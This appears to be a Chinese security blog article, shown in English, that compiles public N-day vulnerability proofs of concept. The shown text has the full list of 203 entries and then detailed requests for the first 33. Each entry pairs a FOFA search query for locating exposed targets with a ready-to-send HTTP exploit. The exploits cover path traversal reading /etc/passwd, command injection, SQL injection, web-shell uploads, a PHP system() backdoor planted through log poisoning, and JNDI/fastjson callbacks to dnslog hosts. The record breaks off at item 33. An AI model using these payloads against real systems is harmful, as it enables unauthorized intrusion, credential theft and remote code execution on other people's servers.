Compilation of Publicly Disclosed Internet Vulnerabilities 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is sourced from 网络安全新视界; author: 网络安全新视界.

Purpose: Exploitation of Nday vulnerabilities accounts for a large share of attacks in offensive and defensive security exercises, so we hope this article is of some help to defenders. Defenders can use its contents to check their own exposure.

Vulnerability sources: This article covers 203 POCs for high-impact vulnerabilities published domestically and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Security patches: All vulnerabilities listed are public; contact the product vendor for patches or remediation guidance.

Content: Because of length limits, a few POCs that were too long have been replaced with the placeholder PAYLOAD; search for the full POC yourself if you need it.

Legal rights: If any content infringes a party's legal rights, contact the 网络安全新视界 team through the account backend to have the relevant content removed.

Statement
To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Contents
01
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user addition
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. 稻壳CMS (DocCMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云一脸通 smart management platform 1.0.55.0.0.1 permission bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 mobile campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QAX 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. QAX 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 S200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. 方正 omnimedia news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list
02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"

GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"

GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"

GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user addition
FOFA: title="EasyCVR"

Set password to the MD5 of a password of your own choosing.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"

GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"

GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"

After logging in to the backend with the default admin account, perform the following operation:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained in the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (DocCMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"

GET /search/index.php?keyword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
Host: x.x.x.x

The payload is the double URL encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"

GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"

Step 1: obtain the cookies first.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: execute the function and apply base64 encoding.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command string.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"

GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"

The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"

The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"

The POC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"

GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"

GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"

GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}

22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://DNSLOG"}
}""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"

POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Uploaded file path:
/uapim/static/pages/nc/head.jsp
29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
